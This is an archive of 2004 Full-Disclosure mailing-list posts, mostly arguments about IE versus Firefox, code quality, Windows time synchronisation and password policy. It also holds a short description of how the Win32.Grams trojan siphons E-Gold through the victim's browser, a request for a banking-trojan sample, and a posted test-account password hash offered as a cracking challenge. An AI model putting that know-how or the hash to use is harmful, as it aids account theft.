PROTECTED] On Behalf Of Todd Towles Sent: Tuesday, November 16, 2004 9:19 AM To: joe; [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] IE is just as safe as FireFox Microsoft made a bold step by changing security in SP2. It was going to break stuff...and it was stupid to see people yell about that. They told us it would, we knew it would. I am glad to see they are starting to take steps toward a better systems, but Microsoft has room for improvement to say the least. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] IE is just as safe as FireFox
Well MS isn't about to produce code to configure MAC's and other OSs, wouldn't you say that makes sense? They certainly aren't the experts in writing code for controlling those platforms and I don't see why they would want to. On the flip side there are other companies doing so. Take a look at companies like Centrify and Vintela and what they are doing for *nix / *bsd platforms and integration into Active Directory specifically for SECURE authentication/authorization and policy management in a corporate environment. So once your favorite Solaris box can be configured via AD policies, does it make it an ms toy as well? joe -- Pro-Choice Let me choose if I even want a browser loaded thanks! From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of stephane nasdrovisky Sent: Tuesday, November 16, 2004 8:39 AM To: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] IE is just as safe as FireFox Unfortunatly, ms group policy do not handle mac, solaris, linux, ... only ms toys can be configured using this. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] IE is just as safe as FireFox
So are you saying you truly believe IE to be an integral part of the OS that without it the OS would not be useable or would fail entirely and believe MS implicitly or are you just trying to be a sassy PITA? -- Pro-Choice Let me choose if I even want a browser loaded thanks! -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Gary E. Miller Sent: Tuesday, November 16, 2004 2:09 PM To: Todd Towles Cc: [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] IE is just as safe as FireFox I suggest you re-read about the M$ anti-trust trial. This was certainly NOT the M$ legal positiion. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] IE is just as safe as FireFox
I would rather not get too deep into this. But I think you are mixing the ideas of good code with good documentation or possibly with good hard design specs. In any project there are going to be things that aren't specifically specified in the design that some other module could possibly take advantage of. These are generally considered implementation details. For a basic example, say you have a routine that takes a search filter and returns information based on that filter. Let's say when the spec was written, no thought of the ordering of the data to be returned was defined, it was simply a matter of return the correct data. Actually specifying the order possibly wasn't important or overlooked. Some very high quality code was written to the spec and the specific implementation detail ended up having it so the data got returned in a way that was sorted by some field used in the query or by some arbitrary value specific to the indexing. Someone completely unrelated to the module, say someone who is using that module as an API or as a server app notices that it always comes back sorted and implements some stateless retrieval mechanism around it (I understand, this is their F-U and they wrote bad code here because there are critical untested assumptions). This works for years and years. Then some work is done on the original code and that implementation detail changes and sort is now done in a different way or not at all. Downstream modules dependent on that until then well understood implementation detail implode. The original code was still high quality. Someone just used it in a way that wasn't intended. It is these unintended uses of implementation details that can really bite you and why YOU ALWAYS legacy test code that may be used by something else. I don't think any spec will ever define out 100% what needs to go in and what needs to come out and all of the possible implementation details that could result. I think we can get close and assert the crap out of the input and output based on what we expect and break out when it deviates. But this is an expensive form of coding and I think impacts flexibility a little. Anyway, on the flip side you could have horrible spaghetti code that conforms very well to a published spec as well. I would tend to agree that normally that would be harder to work on (except for maybe the person who originall wrote it) but want to put emphasis on the importance truly being in the spec and data assertions. I completely agree that IE is too intertwined and it gives the appearance that the OS needs it. It does need to be stripped back out or the piece that allegedly has to be there for OS functionality needs to be stripped down to very bare very basic pieces that disallows and extension or code execution. joe -- Pro-Choice Let me choose if I even want a browser loaded thanks! -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Eric Paynter Sent: Tuesday, November 16, 2004 4:19 PM To: [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] IE is just as safe as FireFox But high quality code that has a sound and well documented architecture can be more easily updated without messing up dependencies, whereas low quality code can be a nightmare to find let alone correct even the most trivial bug. There are always exceptions, but *in general*, it is easier (less effort, faster turnaround) to maintain high quality code. -Eric ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] IE is just as safe as FireFox
Ah thanks, that answers my question. :o) On the MS defender comment. Well I can't say much other than not everyone thinks that a company is entirely good or entirely bad. I have a more granular outlook on things. Some things are done well, some things aren't. That applies to all OSes. None of them do everything right. joe -- Pro-Choice Let me choose if I even want a browser loaded thanks! -Original Message- From: Gary E. Miller [mailto:[EMAIL PROTECTED] Sent: Wednesday, November 17, 2004 5:24 PM To: joe Cc: [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] IE is just as safe as FireFox -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Yo Jo! Who am I to tell Bill Gates he is a liar and a perjurer? He and his employees, under oath, said IE is an indivisible part of the OS. So it must be so. :-) I do not have an opinion since I gave up WinBlows years ago. Just seemed odd to me that an M$ defender would not be going with the party line and suggesting the IE is not part of the OS. Sorta thought that was obvious from the context which you deleted, but some people are clueless and can not be helped. RGDS GARY - --- Gary E. Miller Rellim 20340 Empire Blvd, Suite E-3, Bend, OR 97701 [EMAIL PROTECTED] Tel:+1(541)382-8588 Fax: +1(541)382-8676 On Wed, 17 Nov 2004, joe wrote: So are you saying you truly believe IE to be an integral part of the OS that without it the OS would not be useable or would fail entirely and believe MS implicitly or are you just trying to be a sassy PITA? -- Pro-Choice Let me choose if I even want a browser loaded thanks! -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Gary E. Miller Sent: Tuesday, November 16, 2004 2:09 PM To: Todd Towles Cc: [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] IE is just as safe as FireFox I suggest you re-read about the M$ anti-trust trial. This was certainly NOT the M$ legal positiion. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.3 (GNU/Linux) iD8DBQFBm8+I8KZibdeR3qURArLiAJ4lNKKb6vXfZk4ZpO0Ht1wo71XGOACg5Xqf mpQcKH20wry5bfQpubn2wvw= =NLch -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [in] Re: [Full-Disclosure] IE is just as safe as FireFox
I think that this corporate policy will have far more impact on your company than on Microsoft. As more and more people and companies deploy XP2, it makes me wonder if you should just consider leaving the Microsoft market entirely. As to why it isn't on Windows Update... I would guess that is because not everyone is running your software or software that is impacted by what you are complaining about. I have been running XP2 on several machines for some time now and have no issues with it on them. My work laptop isn't running XP2 but that is simply because I am waiting for the corporate go ahead once they finish regression testing all apps. I have a virtual machine on the laptop running XP2 that I have been testing it with the corporate network and everything seems to be fine there. My question would be, did your app break only on the final release or did you guys just ignore the public beta figuring you didn't need to test your product because it was, IYO, MS's responsibility to make sure you worked after the update? Does your company as a whole feel attempts at securing machines shouldn't be attempted by Microsoft? I am curious what this says about your company's take on security is. joe -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Gregory Gilliss Sent: Sunday, November 14, 2004 12:39 PM To: [EMAIL PROTECTED] Subject: Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox One comment about XP2 - the company where I work (which produces security networking appliances) has a corporate policy - we do not support XP2. Sales hates this (because all the numbnuts out there are pulling SP2 down with autoupdate and they have no clue what they have brought upon themselves) but since M$ was so idiotic as to disable the network functionality that allows reverse proxies to function properly (and I'm not talking about Juniper's back door where they pipe things straight through) it basically makes my company's (and every other company's) product break. The really dumb part is that M$ has a patch for their misdeeds and a knowledge base article and everything - but it's not incoroporated into autoupdate. Wonder why they would not include that fix for SP2 in autoupdate? Maybe they *want* to break other company's products? Nah ... G G ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] MSIE srcname property disclosure
How is it an example? -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Dave Aitel Sent: Monday, November 08, 2004 9:49 AM To: Michal Zalewski Cc: Berend-Jan Wever; [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] MSIE srcname property disclosure SNIP WINS is a classic example. SNIP ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] MSIE srcname property disclosure
I don't know how your club works. Do you report to MS as well or just within your club that you charge people to be part of? Has MS responded to you if you did report it? What was their response that makes WINS a classic example? joe -Original Message- From: Dave Aitel [mailto:[EMAIL PROTECTED] Sent: Monday, November 15, 2004 3:38 PM To: joe Cc: 'Michal Zalewski'; 'Berend-Jan Wever'; [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] MSIE srcname property disclosure That's a good question for your Microsoft sales rep. If you want technical details, Immunity has a working and reliable Wins exploit in the Vulnerability Sharing Club version of CANVAS. I think there's an interesting difference between how the Linux community handled the recent kernel bugs, and how Microsoft and other commercial vendors handle all bugs. Dave Aitel Immunity, Inc. joe wrote: How is it an example? -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Dave Aitel Sent: Monday, November 08, 2004 9:49 AM To: Michal Zalewski Cc: Berend-Jan Wever; [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] MSIE srcname property disclosure SNIP WINS is a classic example. SNIP ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] XP vs 2K
What in the event log is telling you Server service not running is causing your BSDs? I run that way on 4 out 6 XP machines here at home. joe -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of [EMAIL PROTECTED] Sent: Monday, November 15, 2004 11:47 AM To: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] XP vs 2K this) doesn't trust me to config the system the way *I* want. For example, I decided one day to disable some services (server, messenger, etc) for security, the same ones recommended to disable on any win2k/xp machine exposed to the internet. So, all's going good and fine, until i reboot. Now, XP gives me (intermittently) a BSOD at startup! I check the system logs, and find that the crashes were from server service not being able to startup. very weird ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] IE is just as safe as FireFox
Everytime a Firefox exploit comes out..there is already a fix... is that magic? No..it is good coding... What? Having a quick fix out is due to low complexity of issue and assisted by a lack of dependencies so you have reduced time for patching and testing. It has nothing to do with code quality. I have seen some extremely good code that hit an issue that took long periods of time to correct due to the complexity of the issue with all of the requirements that had to be stacked up to cause an issue. I have also seen crappy code that could be pretty quickly patched up for various things and often contributed to how crappy it was. Again, code quality and time to patch has nothing to do with each other except if you had great code you wouldn't even have to worry about exploits and patching. Great code, IMO, requires 100% assertions of all incoming data and NO ONE does that. Programmers assume that incoming data will fit in a specific range and go with it. At some point we as developers (some earlier than others) learned that we should at least be checking for data length though that still isn't the full assertion that should be done on the quality and state of the data. One reason for not doing a full assertion is for future flexibility, don't check the data too close so you don't have to recompile for a new use. Mostly it is done because coders just don't think someone will do something so off the wall or are too lazy or too pressed for time to care. Saying that, I agree, as I have stated many times on this list, that IE needs to be backed down. If there has to be some piece of it that absolutely has to be in the OS it should be a very basic very small very simple hello world basic HTML only rendering capability - you get fonts and anchors and not much more - it isn't even possible to execute anything even if the user agrees with a signature in blood. The code being tiny and truly a part of the OS in that it isn't possible to upgrade it to IE version x. It is updated with OS updates. Code so small and tight and well controlled and understood and practically memorized by the developers that MS could put a monetary guarantee behind the ability to exploit it. Say HTTP-EQUIV gets $10 million if he finds a way to crack it and run remote exploit code with a realistic POC. If someone wants a full function IE, they load that separately an dit runs in a sandbox as guest. Personally I never agreed that IE was truly part of the OS. There are some artificial dependencies built in for some of the display stuff like help, etc but NTFS and threading and all of that works just fine without IE. If pulling IE out of the Explorer shell is too difficult. Then I for one would be fully behind a new secure type shell replacement for the Explorer Shell. We had ProgMan Shell for several years then we got the Explorer Shell. Maybe it is time to get a new shell, at least for servers. I was recently in Redmond and the message I kept feeding back over and over again was that we needed a way to not have to load IE onto machines. I am looking to moving forward ideas. If they give me the ability, I am not going to whine why I can't do the same on Win9x or 2K or even XP. So many people bitch on this list about MS supporting legacy stuff and then they or someone else starts bitching that MS isn't back porting the changes. Pick one or the other but keep in mind if things have to keep getting back ported, resources for that aren't moving us forward. I myself, would rather move forward. joe -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Todd Towles Sent: Friday, November 12, 2004 10:10 AM To: Rafel Ivgi, The-Insider; [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] IE is just as safe as FireFox SNIP Everytime a Firefox exploit comes out..there is already a fix...is that magic? No..it is good coding... SNIP ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Troj/Banker-AJ
Has anyone seen this in the wild? I'm looking for a sample for analysis. Please contact me off list. http://www.sophos.com/virusinfo/analyses/trojbankeraj.html http://news.com.com/Trojan+horse+spies+on+Web+banking/2100-7349_3-5448622.html?tag=nefd.top TIA J ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Win32.Grams - E-Gold Account Siphoner
I've written up an analysis of the Win32.Grams trojan. It differs from previous E-Gold phishing trojans in that it doesn't steal credentials; it uses the victim's own browser to siphon all the E-Gold (well, almost all, it leaves them .004 grams) directly from their account to another E-Gold account, using OLE automation. This would completely bypass all the new authentication methods financial institutions are using to thwart keystroke loggers/password stealers, because the trojan simply lets the user do the authentication, then takes over from there. Full analysis is here: http://www.lurhq.com/grams.html -Joe -- Joe Stewart, GCIH Senior Security Researcher LURHQ http://www.lurhq.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Windows Time Synchronization - Best Practices
So right off the bat you know you are sacrificing something. Why settle for less than the best when the best is free? Two reasons. Say you don't need the full feature set of NTP and/or you manage hundreds of thousands of machines globally and you don't want to have to add something additional. Microsoft Windows Domains are to my knowledge, the only systems out of the box dependent on kerberos. Time is extremely important for kerberos and extremely important for Windows Domains. I have seen many examples of the Windows SNTP implementation working perfectly fine across very large companies with several hundred thousand machines with no need to install/manage any other software. These environments fall into the default Windows Domain configuration of the members talking to their domain controller for time and their domain controller going up the chain until you get to the forest root PDC which takes its time from some defined time source(s). Even if the defined time source isn't correct the entire forest has the same wrong time which is actually more important for a majority of the work done in a domain than having the exact right time. Additionally I managed a Windows AD Domain environment with some 200,000+ Windows machines for 4 years and almost never had to think about time because the builtin Windows time system worked. The points I had to think about it were when someone took it into their own hands and set their own time sources either with the Windows software or with third party software and that time source wasn't accurate. If the time is wrong across an entire forest that is almost certainly the fault of the admins configuring the DCs or the vendor consultants for the company not knowing what they are talking about - not a failing in SNTP. If you take on one-off home PCs, people can do whatever they want for time. Managing additional software on your home personal PC is extremely different from doing it for tens or hundreds of thousands of machines across the world. Additionally, if your home PC time is different from some other machine, it usually won't impact your ability to logon to the local machine because you are using the local PCs IDs though it could impact various other secure transactions with other systems. Never heard of time.microsoft.com being down or incorrect. Me neither, but it has been unreachable. Since the original requestor was from Brazil I would think that reachability would be an issue for him. time.microsoft.com is simply a default if nothing else is set. Change it, that is extremely easy. Yeah, but you are still stuck with only ONE server, you are stuck with SNTP and you have almost no way to tell if the time daemon is doing the right thing. Incorrect on all accounts except you are using SNTP and you still haven't shown a valid reason why that is bad. joe -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Gary E. Miller Sent: Thursday, October 21, 2004 5:47 PM To: Cushing, David Cc: [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] Windows Time Synchronization - Best Practices -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Yo David! On Thu, 21 Oct 2004, Cushing, David wrote: In my experience NTP will work a lot better for you than Windows Time server. Windows time service uses SNTP. SNTP is RFC 2030, It says: SNTP can be used when the ultimate performance of the full NTP implementation described in RFC-1305 is not needed or justified. So right off the bat you know you are sacrificing something. Why settle for less than the best when the best is free? RFC 2030 Continues: It is strongly recommended that SNTP be used only at the extremities of the synchronization subnet. SNTP clients should operate only at the leaves (highest stratum) of the subnet and ... The full degree of reliability ordinarily expected of primary servers is possible only using the redundant sources, diverse subnet paths and crafted algorithms of a full NTP implementation. Seems to me that rules out using it to connect to the stratum 1 in Seattle, WA from Brazil. The protocol is robust and you are not dependent on the single point of failure called: time.microsoft.com. Never heard of time.microsoft.com being down or incorrect. Me neither, but it has been unreachable. Since the original requestor was from Brazil I would think that reachability would be an issue for him. Last time I was monitoring reachability to Brazil there were often outages and bottlenecks to there from the US. You can use 'net time' or regedit to change it. http://www.microsoft.com/windows2000/docs/wintimeserv.doc Yeah, but you are still stuck with only ONE server, you are stuck with SNTP and you have almost no way to tell if the time daemon is doing the right thing. With NTP you can designate a local master that gets it's time from a diverse set of sources. It is easy to verify and monitor it's proper
Re: [Full-Disclosure] Will a vote for John Kerry be counted by aHartInterCivic eSlate3000 in Honolulu? - OT
We can only pray that al-quaeda isn't as successful as they were in Spain. It would have seemed there was enough controversy in the news about the electronic voting machines for people not to use them but hey, people probably still use IE. It's interesting what is needed to sway a people. Joe Hood On Fri, 22 Oct 2004 00:10:29 +1300, Nick FitzGerald [EMAIL PROTECTED] wrote: Gregh ([EMAIL PROTECTED]) wrote: FYI - I know a lot of Americans FEEL that way but FYI once more, it isn't true to most people in the world. Well, speaking for clearly ignorant Ozzies such as yourself, you may well be correct -- after all, you're the folk who just re-elected, as your Prime Minister, the biggest Dubya-toadie outside of the White House and the Iraqi interim governing council (or whatever they masquerade as). Most of the non-US folk I've met in the last six months (and many US citizens too) are downright petrified of a Bush re-election. Please - can we take this OFF list now? Thanks. Had you followed your own advice by not posting your inflammatorily ignorant off-topic opinion, you would not have prompted this (and other) followups... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Senior M$ member says stop using passwords completely!
Well I don't think anyone is saying that the issue is that 128 character passwords are being easily hacked so I am not quite sure I understand your point about 256 characters and why you mention it. People seem to dislike passwords greater than 14 characters let alone entering passwords of 150 , 200 , or 250 characters. To put it another way, if MS suddenly increased the buffer to allow for hashing of passwords 1024 characters in size would you push that MS was more secure based on that? I doubt it, I certainly wouldn't. BTW, I tried the link someone previously gave with the password hash I previously posted and it is well under 128 characters and the web site reported: Password: not found! joe -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Eric Paynter Sent: Monday, October 18, 2004 1:32 PM To: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Senior M$ member says stop using passwords completely! On Sat, October 16, 2004 5:25 pm, Tim said: The reason for my post was to point out that Mr. Hensing doesn't appear to be a reliable source of information on the topic of passwords and hash security. I think that much became apparent when Mr. Hensing took sarcastic shots at Linux security (e.g. Attack easier targets like all those Linux boxes you installed because its so much more secure . . .). Funny thing is, Linux supports up to 256 character passwords by default - twice as long as Windows. -Eric -- arctic bears - email and dns services http://www.arcticbears.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] RE: [Full-Disclosure]Open the doors to hell hire a hicker Full-Disclosure Posts
On Mon, 18 Oct 2004 10:28:39 -0400, Clairmont, Jan M [EMAIL PROTECTED] wrote: Hire the burgler to secure your home, yeah right? Doh! Sheessh what a stupid idea? How is it a stupid idea? *Looks confused*. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Re: Stupid idea
On Tue, 19 Oct 2004 12:11:04 -0600, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: Just wanted to help you out in no-flame mode. The reason no one hires known burglars to secure their homes is that the occupation of burglars is to break into buildings and steal things. If this still seems unclear to you, hire someone who is out on bail awaiting trial on burglary charges to secure your home. Yes, I would ask him to secure my home. I wouldn't get a jumped up academic to do it, thats for sure. They wouldn't know the first place to start and certainly wouldn't have a natural burglar way of thinking. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Re: Stupid idea
On Tue, 19 Oct 2004 17:52:54 -0400, Byron L. Sonne [EMAIL PROTECTED] wrote: [EMAIL PROTECTED] wrote: Carolyn Meinel! Hahaha... is she on this list? Nar, it was a private e-mail... :-) ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Senior M$ member says stop using passwords completely!
I think Mr. Hensing was trying to tell people how to be more secure with what they currently have. While I agree that added length doesn't necessarily make a password theoretically stronger, a passphrase will tend to be longer than 14 characters and push you past the storage of the lm hash which has the chunking you described[1] and will most likely not be one of the 50 or so most commonly used passwords making many of the little automated crackers for viruses worthless. Plus if cracking a password of 10-12 words, the cracker best know that it is a passphrase versus a password up front or else the cracking token used in the brute force will be characters which will take a while or use some fairly large tables. Personally the part I didn't really agree with was forcing longer passwords through the policy. I like the idea of forcing a longer password but not through the Windows policy, but through a password filter so that a machine/person can't query what the actual policy is. If you as a cracker just know the password must be between 6 and 128 characters (or 1-128 characters) you can't really assume that a passphrase is being used. If you encounter a policy set to 20-25 characters minimum it would be a rather good guess that a pass phrase would be used so you can start using words as tokens instead of characters and substantially narrow your tables or brute force range. BTW, if you want, here is a password from one of my test ids. My policy on my local machine requires a password of 6 characters or better. How long does it take you to crack it? Brute force or table and if table how big of a table? testuser:1022:NO PASSWORD*:015ED52DE1744CE8352899BA93702E88::: From the rest of your writing it seems you tore into it merely because you don't like MS. Note that the blogs done by the MS employees are not filtered/controlled by MS. They are just people who want to put out info that will hopefully help the users and people working with the technology. The fact that he made a recommendation of using a passphrase versus a password wasn't a statement for or against salted hashes. He was, again, telling people what to do to help with what they currently have. Far more useful than a rant against something he has no control over as I'm sure if he had the pull to make that change by saying the word, what I know of him from other things I have read would tell me he probably would do it. You trying to gauge his knowledge and capability based on a blog that you don't think says what needs to be said is on par with me trying to gauge your knowledge based on what you have written here. Quite honestly, the quality of password hashes in the Windows world is far less an issue than the quality of passwords being used if they are being used at all. The problems you point out for all internet users has nothing to do with password hashes. The viruses of which I think you are alluding too don't crack passwords due to unsalted hashes, they crack simple easy passwords people use through brute force attempts because they are weak and the machines have disabled or weak password lockout policies or alternatively walk through open doors on unpatched machines or most likely are social engineering pieces that get some numbskill to click on things and just run them. Whether they are done at the click or have to type in three passwords and hop on one leg doesn't matter, some people will just do it so they can see that picture of Brittany Spears or get those instructions on how to re-enable their account. joe [1] This can also be done with policy/registry modification but it dependent on how much legacy support is required for a system. More than anything, this legacy support really hurts MS'es attempts to get more secure. MS has historically bent to try and keep legacy systems functional, far more than they should in my opinion. The latest SP for XP they didn't do this to the extent they did in the past and the whining about it will be considered legendary some day. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Tim Sent: Saturday, October 16, 2004 8:25 PM To: Micheal Espinola Jr Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Senior M$ member says stop using passwords completely! Hello Mr Espinola, That much is obvious. Read the the full article, do a little background research and get back to us when you reach a more sensible conclusion. The reason for my post was to point out that Mr. Hensing doesn't appear to be a reliable source of information on the topic of passwords and hash security. If you haven't come to the same conclusion, perhaps you should do more homework yourself. Reactionary conclusions based on obvious article 'skimming' make it apparent you didn't do your homework before posting. Pardon me for my reactionary style. I am merely frustrated by M$'s irresponsible business practices, and their unwillingness to correct
Re: [Full-Disclosure] EEYE: Windows Shell ZIP File Decompression DUNZIP32.DLL Buffer Overflow Vulnerability
A few things I've noticed with this advisory: eEye states that the vulnerability is an overflow in dunzip32.dll and that MS04-034 fixes it. However, from what I've seen MS04-034 only patches zipfldr.dll. Further, MS04-034 claims that Windows ME is not vulnerable, while eEye says it is. Also, eEye says that the dunzip32.dll overflow is an issue for XP, yet I am unable to find dunzip32.dll on a stock XP SP1 system. Is it possible that the eEye release and the MS04-034 bulletin are talking about two separate issues? -Joe -- Joe Stewart, GCIH Senior Security Researcher LURHQ http://www.lurhq.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11
Definitely some interesting theories Ron. 1 the code was better done under the original OS, unix While possible, nothing actually points at this as being the case. Anyway, I would be curious as to the functionality of the system when it was first launched on UNIX versus the end-result. Put this on Windows and run it 10 years and then port to UNIX or *nix and there will almost certainly be screwups there as well. In fact, I would be pretty confident. I have dealt with poor ports to and from Windows and *nix. I have even dealt with bad ports from Mainframes to UNIX where the whole time the Mainframe people were saying the same types of things about UNIX that you like to say about Windows. Being a good coder for one OS doesn't make you one for all Oses when dealing with system level components and interfaces. 2 considering how often you seems to run into this same issue with other coders in the windows realm, windows coders tend to be especially lazy/clueless as compared to coders in other OS' I would expect the issue is the same as always. Sheer volume. There are good and bad coders period. Microsoft has surely drawn more poor coders than any other OS with its pushing of the RAD/simple coding environment such as VB. Additionally the Windows environment as a whole has more inexperienced users and admins and people likely to try and code. There are also many good ones as well, they are just well buried in the poor ones. 3 tools to code with in the windows realm are not as 3 developed/functional as they are in other envs I would say this opinion is uninformed. 4 M$ does not properly provide developers with clued information with which to do their jobs This is another opinion which I would call rather uninformed. Even if there was poor function documentation, if you have a function, any function returning a constantly increasing counter you know, as a skilled programmer, that eventually it has to do something other than increase. If the value is signed the sign bit will flip or if it is unsigned it will roll to 0. How can a good programmer think any other thing? The compiler could have inserted exception handling code but at best that is simply going to bounce the program out of a normal running state. That is a compiler thing though, not an OS thing. I do hope you aren't trying to tell me that UNIX can magically and infinitely maintain a counter on a variable with a fixed bit size. I try to consider you to be a bit more intelligent than that. To put it in anotehr way, if you have a set of tires on a car that are rated for 75 MPH (say off road truck tires) and some person goes 90 and the tires fly apart or the vehicle flips or both, is the issue the driver, the vehicle manufacturer, the tire manufacturer, or the tree that produced the rubber for the tire? This is the same sort of case. You have it in your mind ahead of time who you want to be at fault because you have a bug up your bum about it and work to prove that stance. Poor coding is a result of poor coders. I have seen amazingly bad code on all OS/RTS platforms I have worked on from RSTS to BSD to Linux to Windows to DOS to VMS. I have also seen some amazingly good stuff on the same platforms. Someone who doesn't understand basic data types and how to handle their limits is going to do a shitty job on all of the platforms. Is the ratio of good admins to bad admins better in UNIX versus Windows? Absolutely. Is the ratio of good programmers to bad programmers better in UNIX versus Windows? Most certainly. Does this mean all Windows admins are bad admins, obviously not. Does this mean all Windows programmers are bad programmers, obviously not. I specifically say UNIX versus *nix because I think *nix is one or more steps closer to Windows in this discussion and getting closer as its popularity grows with Windows users. Switching to *nix doesn't make the admins or coders switching (or just using in tandem) any better simply because they switched. -Original Message- From: Ron DuFresne [mailto:[EMAIL PROTECTED] Sent: Friday, September 24, 2004 11:25 PM To: joe Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11 On Fri, 24 Sep 2004, joe wrote: Again, there are valid uses of GetTickCount and there are safe ways of doing so. If there is concern, I do recommend testing functionality associated with each of the DLLs. You might find a bug you can report for kudos. On the incident, I would guess the vendor never had a clue it would do that. That function can't return more than 49.7 days without breaking every app that currently uses it. MS can not do that. That is why there is another function to get the info with a different datatype. See my other posts. What seems to read clearly from your replies to this thread is that either; 1 the code was better done under the original OS, unix 2 considering how often you seems to run
RE: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11
Nod. Some knucklehead used GetTickCount or clock() for their app and had no clue about datatypes and overflows and range of possible values and some people go off on Windows. I was helping someone in the public newsgroups with a similar issue. Experienced 10 year c coder who didn't understand why a long value would go negative and start counting down... He could have been coding for Windows or anything else. Unfortunately he chose Windows so his app contributes to people thinking Windows doesn't work. The state of programming right now is like the state of the roads in Michigan. Mostly in disrepair and everyone blaming the weather instead of poor road building skills. In the meanwhile the Dept of Transpotation keeps hiring inexperienced road workers for some poor salary and using lowest bidder to build the roads and expecting them to miraculously get better. joe -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of ASB Sent: Friday, September 24, 2004 7:22 AM To: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11 That has nothing to do with Windows, and everything to do with a stupid application. ...as if stupid app developers are solely the products of Windows environments. -ASB On Fri, 24 Sep 2004 11:32:29 +0200 (CEST), Feher Tamas [EMAIL PROTECTED] wrote: http://www.techworld.com/opsys/news/index.cfm?NewsID=2275 Next time think twice before replacing Un*x with Voles! ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11
